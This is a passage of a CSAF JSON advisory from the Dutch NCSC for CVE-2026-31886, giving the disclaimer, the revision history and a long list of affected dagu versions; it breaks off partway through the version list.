{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-31886",
        "tracking": {
            "current_release_date": "2026-03-26T01:47:22.489713Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-31886",
            "initial_release_date": "2026-03-13T16:48:15.893052Z",
            "revision_history": [
                {
                    "date": "2026-03-13T16:48:15.893052Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-13T16:48:19.823057Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-13T19:38:41.735848Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-13T19:38:47.850064Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-13T20:31:33.385506Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-13T20:31:40.063708Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-13T20:39:05.359855Z",
                    "number": "7",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-14T14:51:52.171727Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-14T14:52:00.668645Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-16T01:27:32.124814Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-16T16:43:02.358901Z",
                    "number": "11",
                    "summary": "References created (3)."
                },
                {
                    "date": "2026-03-16T16:43:04.728346Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-18T15:27:41.301464Z",
                    "number": "13",
                    "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-18T15:27:48.847781Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-19T15:28:49.749705Z",
                    "number": "15",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-19T15:28:51.750026Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:32:24.609698Z",
                    "number": "17",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:32:26.975341Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:13:50.505841Z",
                    "number": "19",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T18:13:52.682762Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:15:23.438188Z",
                    "number": "21",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (1)."
                },
                {
                    "date": "2026-03-25T21:44:02.687093Z",
                    "number": "22",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (195).| Products created (14).| References created (4).| CWES updated (1)."
                }
            ],
            "status": "interim",
            "version": "22"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.2.4",
                                "product": {
                                    "name": "vers:unknown/<2.2.4",
                                    "product_id": "CSAFPID-5844410",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:dagu:dagu:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "dagu"
                    }
                ],
                "category": "vendor",
                "name": "dagu"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.2.4",
                                "product": {
                                    "name": "vers:unknown/<2.2.4",
                                    "product_id": "CSAFPID-5825017"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=2.2.4",
                                "product": {
                                    "name": "vers:unknown/>=0|<=2.2.4",
                                    "product_id": "CSAFPID-5907261"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.1",
                                "product": {
                                    "name": "vers:unknown/v1.0.1",
                                    "product_id": "CSAFPID-5700905"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.0.2",
                                "product": {
                                    "name": "vers:unknown/v1.0.2",
                                    "product_id": "CSAFPID-5700906"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.0",
                                "product": {
                                    "name": "vers:unknown/v1.1.0",
                                    "product_id": "CSAFPID-5700907"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.1",
                                "product": {
                                    "name": "vers:unknown/v1.1.1",
                                    "product_id": "CSAFPID-5700908"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.2",
                                "product": {
                                    "name": "vers:unknown/v1.1.2",
                                    "product_id": "CSAFPID-5700909"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.3",
                                "product": {
                                    "name": "vers:unknown/v1.1.3",
                                    "product_id": "CSAFPID-5700910"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.4",
                                "product": {
                                    "name": "vers:unknown/v1.1.4",
                                    "product_id": "CSAFPID-5700911"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.5",
                                "product": {
                                    "name": "vers:unknown/v1.1.5",
                                    "product_id": "CSAFPID-5700912"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.6",
                                "product": {
                                    "name": "vers:unknown/v1.1.6",
                                    "product_id": "CSAFPID-5700913"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.7",
                                "product": {
                                    "name": "vers:unknown/v1.1.7",
                                    "product_id": "CSAFPID-5700914"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.8",
                                "product": {
                                    "name": "vers:unknown/v1.1.8",
                                    "product_id": "CSAFPID-5700915"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.1.9",
                                "product": {
                                    "name": "vers:unknown/v1.1.9",
                                    "product_id": "CSAFPID-5700916"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.10.1",
                                "product": {
                                    "name": "vers:unknown/v1.10.1",
                                    "product_id": "CSAFPID-5700917"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.10.2",
                                "product": {
                                    "name": "vers:unknown/v1.10.2",
                                    "product_id": "CSAFPID-5700918"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.10.3",
                                "product": {
                                    "name": "vers:unknown/v1.10.3",
                                    "product_id": "CSAFPID-5700919"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.10.4",
                                "product": {
                                    "name": "vers:unknown/v1.10.4",
                                    "product_id": "CSAFPID-5700920"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.10.5",
                                "product": {
                                    "name": "vers:unknown/v1.10.5",
                                    "product_id": "CSAFPID-5700921"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.10.6",
                                "product": {
                                    "name": "vers:unknown/v1.10.6",
                                    "product_id": "CSAFPID-5700922"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.11.0",
                                "product": {
                                    "name": "vers:unknown/v1.11.0",
                                    "product_id": "CSAFPID-5700923"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.0",
                                "product": {
                                    "name": "vers:unknown/v1.12.0",
                                    "product_id": "CSAFPID-5700924"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.1",
                                "product": {
                                    "name": "vers:unknown/v1.12.1",
                                    "product_id": "CSAFPID-5700925"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.10",
                                "product": {
                                    "name": "vers:unknown/v1.12.10",
                                    "product_id": "CSAFPID-5700926"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.11",
                                "product": {
                                    "name": "vers:unknown/v1.12.11",
                                    "product_id": "CSAFPID-5700927"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.2",
                                "product": {
                                    "name": "vers:unknown/v1.12.2",
                                    "product_id": "CSAFPID-5700928"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.3",
                                "product": {
                                    "name": "vers:unknown/v1.12.3",
                                    "product_id": "CSAFPID-5700929"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.4",
                                "product": {
                                    "name": "vers:unknown/v1.12.4",
                                    "product_id": "CSAFPID-5700930"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.5",
                                "product": {
                                    "name": "vers:unknown/v1.12.5",
                                    "product_id": "CSAFPID-5700931"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.6",
                                "product": {
                                    "name": "vers:unknown/v1.12.6",
                                    "product_id": "CSAFPID-5700932"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.7",
                                "product": {
                                    "name": "vers:unknown/v1.12.7",
                                    "product_id": "CSAFPID-5700933"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.8",
                                "product": {
                                    "name": "vers:unknown/v1.12.8",
                                    "product_id": "CSAFPID-5700934"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.12.9",
                                "product": {
                                    "name": "vers:unknown/v1.12.9",
                                    "product_id": "CSAFPID-5700935"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.13.0",
                                "product": {
                                    "name": "vers:unknown/v1.13.0",
                                    "product_id": "CSAFPID-5700936"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.13.1",
                                "product": {
                                    "name": "vers:unknown/v1.13.1",
                                    "product_id": "CSAFPID-5700937"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.14.0",
                                "product": {
                                    "name": "vers:unknown/v1.14.0",
                                    "product_id": "CSAFPID-5700938"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.14.1",
                                "product": {
                                    "name": "vers:unknown/v1.14.1",
                                    "product_id": "CSAFPID-5700939"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.14.2",
                                "product": {
                                    "name": "vers:unknown/v1.14.2",
                                    "product_id": "CSAFPID-5700940"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.14.3",
                                "product": {
                                    "name": "vers:unknown/v1.14.3",
                                    "product_id": "CSAFPID-5700941"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.14.4",
                                "product": {
                                    "name": "vers:unknown/v1.14.4",
                                    "product_id": "CSAFPID-5700942"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.14.5",
                                "product": {
                                    "name": "vers:unknown/v1.14.5",
                                    "product_id": "CSAFPID-5700943"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.14.6",
                                "product": {
                                    "name": "vers:unknown/v1.14.6",
                                    "product_id": "CSAFPID-5700944"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.14.7",
                                "product": {
                                    "name": "vers:unknown/v1.14.7",
                                    "product_id": "CSAFPID-5700945"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.14.8",
                                "product": {
                                    "name": "vers:unknown/v1.14.8",
                                    "product_id": "CSAFPID-5700946"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.15.0",
                                "product": {
                                    "name": "vers:unknown/v1.15.0",
                                    "product_id": "CSAFPID-5700947"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.15.1",
                                "product": {
                                    "name": "vers:unknown/v1.15.1",
                                    "product_id": "CSAFPID-5700948"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.0",
                                "product": {
                                    "name": "vers:unknown/v1.16.0",
                                    "product_id": "CSAFPID-5700949"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.1",
                                "product": {
                                    "name": "vers:unknown/v1.16.1",
                                    "product_id": "CSAFPID-5700950"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.10",
                                "product": {
                                    "name": "vers:unknown/v1.16.10",
                                    "product_id": "CSAFPID-5730985"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.11",
                                "product": {
                                    "name": "vers:unknown/v1.16.11",
                                    "product_id": "CSAFPID-5730986"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.12",
                                "product": {
                                    "name": "vers:unknown/v1.16.12",
                                    "product_id": "CSAFPID-5730987"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.2",
                                "product": {
                                    "name": "vers:unknown/v1.16.2",
                                    "product_id": "CSAFPID-5700951"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.3",
                                "product": {
                                    "name": "vers:unknown/v1.16.3",
                                    "product_id": "CSAFPID-5700952"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.4",
                                "product": {
                                    "name": "vers:unknown/v1.16.4",
                                    "product_id": "CSAFPID-5700953"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.5",
                                "product": {
                                    "name": "vers:unknown/v1.16.5",
                                    "product_id": "CSAFPID-5700954"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.6",
                                "product": {
                                    "name": "vers:unknown/v1.16.6",
                                    "product_id": "CSAFPID-5700955"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.7",
                                "product": {
                                    "name": "vers:unknown/v1.16.7",
                                    "product_id": "CSAFPID-5700956"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.8",
                                "product": {
                                    "name": "vers:unknown/v1.16.8",
                                    "product_id": "CSAFPID-5730988"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.9",
                                "product": {
                                    "name": "vers:unknown/v1.16.9",
                                    "product_id": "CSAFPID-5730989"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0",
                                "product": {
                                    "name": "vers:unknown/v1.17.0",
                                    "product_id": "CSAFPID-5730990"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.10",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.10",
                                    "product_id": "CSAFPID-5730991"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.11",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.11",
                                    "product_id": "CSAFPID-5730992"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.12",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.12",
                                    "product_id": "CSAFPID-5730993"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.13",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.13",
                                    "product_id": "CSAFPID-5730994"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.14",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.14",
                                    "product_id": "CSAFPID-5730995"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.15",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.15",
                                    "product_id": "CSAFPID-5730996"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.2",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.2",
                                    "product_id": "CSAFPID-5730997"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.3",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.3",
                                    "product_id": "CSAFPID-5730998"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.4",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.4",
                                    "product_id": "CSAFPID-5730999"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.5",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.5",
                                    "product_id": "CSAFPID-5731000"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.6",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.6",
                                    "product_id": "CSAFPID-5731001"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.7",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.7",
                                    "product_id": "CSAFPID-5731002"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.8",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.8",
                                    "product_id": "CSAFPID-5731003"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0-beta.9",
                                "product": {
                                    "name": "vers:unknown/v1.17.0-beta.9",
                                    "product_id": "CSAFPID-5731004"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.1",
                                "product": {
                                    "name": "vers:unknown/v1.17.1",
                                    "product_id": "CSAFPID-5731005"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.2",
                                "product": {
                                    "name": "vers:unknown/v1.17.2",
                                    "product_id": "CSAFPID-5731006"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.3",
                                "product": {
                                    "name": "vers:unknown/v1.17.3",
                                    "product_id": "CSAFPID-5731007"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.4",
                                "product": {
                                    "name": "vers:unknown/v1.17.4",
                                    "product_id": "CSAFPID-5731008"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.18.0",
                                "product": {
                                    "name": "vers:unknown/v1.18.0",
                                    "product_id": "CSAFPID-5731009"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.18.1",
                                "product": {
                                    "name": "vers:unknown/v1.18.1",
                                    "product_id": "CSAFPID-5731010"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.18.2",
                                "product": {
                                    "name": "vers:unknown/v1.18.2",
                                    "product_id": "CSAFPID-5731011"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.18.3",
                                "product": {
                                    "name": "vers:unknown/v1.18.3",
                                    "product_id": "CSAFPID-5731012"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.18.4",
                                "product": {
                                    "name": "vers:unknown/v1.18.4",
                                    "product_id": "CSAFPID-5731013"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.19.0",
                                "product": {
                                    "name": "vers:unknown/v1.19.0",
                                    "product_id": "CSAFPID-5731014"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.19.1",
                                "product": {
                                    "name": "vers:unknown/v1.19.1",
                                    "product_id": "CSAFPID-5731015"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.2.10",
                                "product": {
                                    "name": "vers:unknown/v1.2.10",
                                    "product_id": "CSAFPID-5700957"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.2.11",
                                "product": {
                                    "name": "vers:unknown/v1.2.11",
                                    "product_id": "CSAFPID-5700958"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.2.12",
                                "product": {
                                    "name": "vers:unknown/v1.2.12",
                                    "product_id": "CSAFPID-5700959"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.2.13",
                                "product": {
                                    "name": "vers:unknown/v1.2.13",
                                    "product_id": "CSAFPID-5700960"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.2.14",
                                "product": {
                                    "name": "vers:unknown/v1.2.14",
                                    "product_id": "CSAFPID-5700961"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.2.15",
                                "product": {
                                    "name": "vers:unknown/v1.2.15",
                                    "product_id": "CSAFPID-5700962"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.2.16",
                                "product": {
                                    "name": "vers:unknown/v1.2.16",
                                    "product_id": "CSAFPID-5700963"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.20.0",
                                "product": {
                                    "name": "vers:unknown/v1.20.0",
                                    "product_id": "CSAFPID-5731016"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.21.0",
                                "product": {
                                    "name": "vers:unknown/v1.21.0",
                                    "product_id": "CSAFPID-5731017"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.22.0",
                                "product": {
                                    "name": "vers:unknown/v1.22.0",
                                    "product_id": "CSAFPID-5731018"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.22.1",
                                "product": {
                                    "name": "vers:unknown/v1.22.1",
                                    "product_id": "CSAFPID-5731019"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.22.2",
                                "product": {
                                    "name": "vers:unknown/v1.22.2",
                                    "product_id": "CSAFPID-5731020"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.22.3",
                                "product": {
                                    "name": "vers:unknown/v1.22.3",
                                    "product_id": "CSAFPID-5731021"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.22.4",
                                "product": {
                                    "name": "vers:unknown/v1.22.4",
                                    "product_id": "CSAFPID-5731022"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.23.0",
                                "product": {
                                    "name": "vers:unknown/v1.23.0",
                                    "product_id": "CSAFPID-5731023"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.23.1",
                                "product": {
                                    "name": "vers:unknown/v1.23.1",
                                    "product_id": "CSAFPID-5731024"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.23.2",
                                "product": {
                                    "name": "vers:unknown/v1.23.2",
                                    "product_id": "CSAFPID-5731025"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.23.4",
                                "product": {
                                    "name": "vers:unknown/v1.23.4",
                                    "product_id": "CSAFPID-5731026"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.0",
                                "product": {
                                    "name": "vers:unknown/v1.24.0",
                                    "product_id": "CSAFPID-5731027"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.1",
                                "product": {
                                    "name": "vers:unknown/v1.24.1",
                                    "product_id": "CSAFPID-5731028"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.11",
                                "product": {
                                    "name": "vers:unknown/v1.24.11",
                                    "product_id": "CSAFPID-5731029"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.2",
                                "product": {
                                    "name": "vers:unknown/v1.24.2",
                                    "product_id": "CSAFPID-5731030"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.3",
                                "product": {
                                    "name": "vers:unknown/v1.24.3",
                                    "product_id": "CSAFPID-5731031"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.4",
                                "product": {
                                    "name": "vers:unknown/v1.24.4",
                                    "product_id": "CSAFPID-5731032"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.5",
                                "product": {
                                    "name": "vers:unknown/v1.24.5",
                                    "product_id": "CSAFPID-5731033"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.6",
                                "product": {
                                    "name": "vers:unknown/v1.24.6",
                                    "product_id": "CSAFPID-5731034"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.7",
                                "product": {
                                    "name": "vers:unknown/v1.24.7",
                                    "product_id": "CSAFPID-5731035"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.24.8",
                                "product": {
                                    "name": "vers:unknown/v1.24.8",
                                    "product_id": "CSAFPID-5731036"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.25.0",
                                "product": {
                                    "name": "vers:unknown/v1.25.0",
                                    "product_id": "CSAFPID-5731037"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.25.1",
                                "product": {
                                    "name": "vers:unknown/v1.25.1",
                                    "product_id": "CSAFPID-5731038"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.26.0",
                                "product": {
                                    "name": "vers:unknown/v1.26.0",
                                    "product_id": "CSAFPID-5731039"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.26.1",
                                "product": {
                                    "name": "vers:unknown/v1.26.1",
                                    "product_id": "CSAFPID-5731040"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.26.2",
                                "product": {
                                    "name": "vers:unknown/v1.26.2",
                                    "product_id": "CSAFPID-5731041"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.26.3",
                                "product": {
                                    "name": "vers:unknown/v1.26.3",
                                    "product_id": "CSAFPID-5731042"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.26.4",
                                "product": {
                                    "name": "vers:unknown/v1.26.4",
                                    "product_id": "CSAFPID-5731043"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.26.5",
                                "product": {
                                    "name": "vers:unknown/v1.26.5",
                                    "product_id": "CSAFPID-5731044"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.27.0",
                                "product": {
                                    "name": "vers:unknown/v1.27.0",
                                    "product_id": "CSAFPID-5731045"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.28.0",
                                "product": {
                                    "name": "vers:unknown/v1.28.0",
                                    "product_id": "CSAFPID-5731046"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.29.0",
                                "product": {
                                    "name": "vers:unknown/v1.29.0",
                                    "product_id": "CSAFPID-5731047"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.29.1",
                                "product": {
                                    "name": "vers:unknown/v1.29.1",
                                    "product_id": "CSAFPID-5731048"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.29.2",
                                "product": {
                                    "name": "vers:unknown/v1.29.2",
